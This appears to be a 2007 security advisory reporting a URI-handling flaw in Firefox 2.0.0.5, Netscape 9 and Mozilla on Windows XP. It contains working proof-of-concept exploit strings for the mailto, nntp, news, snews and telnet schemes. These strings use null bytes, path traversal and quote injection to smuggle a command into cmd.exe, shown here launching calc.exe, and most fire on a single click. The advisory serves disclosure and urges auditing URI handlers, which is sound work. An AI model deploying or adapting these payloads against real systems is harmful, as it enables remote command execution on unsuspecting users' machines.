Remote Command Exec (FireFox 2.0.0.5 et al)

By: Nate McFeters (nate dot mcfeters -at- gmail)

Billy (BK) Rios (billy dot rios -at- gmail)

Tested in FireFox 2.0.0.5 (and 3.0a6), Netscape Navigator 9, and Mozilla browser.

NOTE These examples were created for WinXP SP2 with no external mail programs installed (outlook, notes…etc). If you have an external mail program installed, these examples may not work on your machine (as the URI handling may have changed).

Once again, a flaw in the URI handling behavior allows for remote command execution. UNREGISTER ALL UNNECESSARY URIs NOW! This example shows flaws in Firefox, Netscape, and Mozilla browsers… other browsers are affected by related vulnerabilities.

Developers who intend to (or have already) registered URIs for their applications MUST UNDERSTAND that registering a URI handler exponentially increases the attack surface for that application. Please review your registered URI handling mechanisms and audit the functionality called by those URIs…

These can be launched with no user warning (simply click on the link):
Mailto 0-day
mailto:%00%00…/…/…/…/…/…/windows/system32/cmd%22.exe%20…/…/…/…/…/…/…/…/windows/system32/calc.exe%20%22%20-%20%22%20blah.bat
nntp 0-day
nntp:%00%00…/…/…/…/…/…/windows/system32/cmd%22.exe%20…/…/…/…/…/…/…/…/windows/system32/calc.exe%20%22%20-%20%22%20blah.bat
news 0-day
news:%00%00…/…/…/…/…/…/windows/system32/cmd%22.exe%20…/…/…/…/…/…/…/…/windows/system32/calc.exe%20%22%20-%20%22%20blah.bat
snews 0-day
snews:%00%00…/…/…/…/…/…/windows/system32/cmd%22.exe%20…/…/…/…/…/…/…/…/windows/system32/calc.exe%20%22%20-%20%22%20blah.bat

The following require user interaction:

telnet 0-day
telnet:%00%00…/…/…/…/…/…/windows/system32/cmd%22.exe%20…/…/…/…/…/…/…/…/windows/system32/calc.exe%20%22%20-%20%22%20blah.bat